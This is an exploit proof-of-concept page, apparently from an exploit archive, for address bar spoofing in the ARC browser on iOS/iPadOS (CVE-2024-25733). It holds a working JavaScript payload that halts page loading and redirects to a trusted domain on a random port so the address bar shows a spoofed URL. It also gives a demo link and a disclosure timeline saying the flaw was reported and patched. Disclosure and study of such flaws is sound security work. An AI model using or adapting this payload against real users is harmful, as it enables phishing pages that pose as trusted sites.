Share
## https://sploitus.com/exploit?id=3480059E-1718-5F93-9F01-FDA5C795F7A9
# ARC Browser Address Bar Spoofing - iOS/iPadOS (CVE-2024-25733)
ARC Browser Address Bar Spoofing PoC - iOS/iPadOS

## Exploit PoC (Proof of Concept)

```html
<script>
    function spoof() {
        setTimeout(() => {
            window.stop();
            let randomPort;
            do {
                randomPort = Math.floor(Math.random() * 1000);
            } while (randomPort === 0 || randomPort === 443);
            document.location = "https://google.com:" + randomPort + "/";
        }, 300);
    }
    spoof();
</script>
```
<br>


## DEMO

<a href="https://github.com/hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC/raw/main/PoC.mp4">PoC.mp4</a>
<br>
<br>


## TimeLine

 - 2024-01-25 : Vulnerability reported to The Browser Company of New York
 - 2024-01-25 : Recognized as a security vulnerability
 - 2024-02-13 : Patched in the latest release